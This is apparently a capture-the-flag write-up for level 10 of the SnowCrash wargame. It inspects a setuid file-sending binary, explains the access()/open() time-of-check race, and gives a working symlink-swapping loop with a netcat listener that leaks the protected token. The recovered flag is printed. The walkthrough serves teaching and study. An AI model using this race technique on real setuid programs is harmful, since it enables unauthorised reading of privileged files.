# Level 10

- We got an executable and a token.
	```bash
	level10@SnowCrash:~$ strings level10
	[...]
	%s file host
	sends file to host if you have access to it
	Connecting to %s:6969 ..
	Unable to connect to host %s
	.*( )*.
	Unable to write banner to host %s
	Connected!
	Sending file ..
	Damn. Unable to open file
	Unable to read from file: %s
	wrote file!
	You don't have access to %s
	[...]
	```
	```bash
	level10@SnowCrash:~$ nm -u level10
	[...]
	         U access@@GLIBC_2.0
	         U connect@@GLIBC_2.0
	         U exit@@GLIBC_2.0
	         U fflush@@GLIBC_2.0
	         U htons@@GLIBC_2.0
	         U inet_addr@@GLIBC_2.0
	         U open@@GLIBC_2.0
	         U printf@@GLIBC_2.0
	         U puts@@GLIBC_2.0
	         U read@@GLIBC_2.0
	         U socket@@GLIBC_2.0
	         U strerror@@GLIBC_2.0
	         U write@@GLIBC_2.0
	```
	```bash
	level10@SnowCrash:~$ cat token
	cat: token: Permission denied
	```
- Welp now we know that we must read the contents of the token and that there is
	some kind of file opening involved.
- After some research, `access` is not atomic, meaning that the state of the permissions
	of a file can change after you read it:
	```man
	Warning: Using access() to check if a user is authorized to, for example, open a file before actually
	doing so using open(2) creates a security hole, because the user might exploit the short time interval
	between checking and opening the file to manipulate it. For this reason, the use of this system call
	should be avoided. (In the example just described, a safer alternative would be to temporarily switch
	the process's effective user ID to the real ID and then call open(2).)
	```
- So we shall do exactly that:
	```bash
	level10@SnowCrash:~$ while true; do ln -fs ~/level10 /tmp/exploit; ln -fs ~/token /tmp/exploit; done &
	[1] 15762
	level10@SnowCrash:~$ while true; do ~/level10 /tmp/exploit 127.0.0.1; done &>/dev/null &
	[2] 10482
	level10@SnowCrash:~$ nc -lk 6969
	[...]
	.*( )*.
	woupa2yuojeeaaed06riuj63c
	[...]
	```
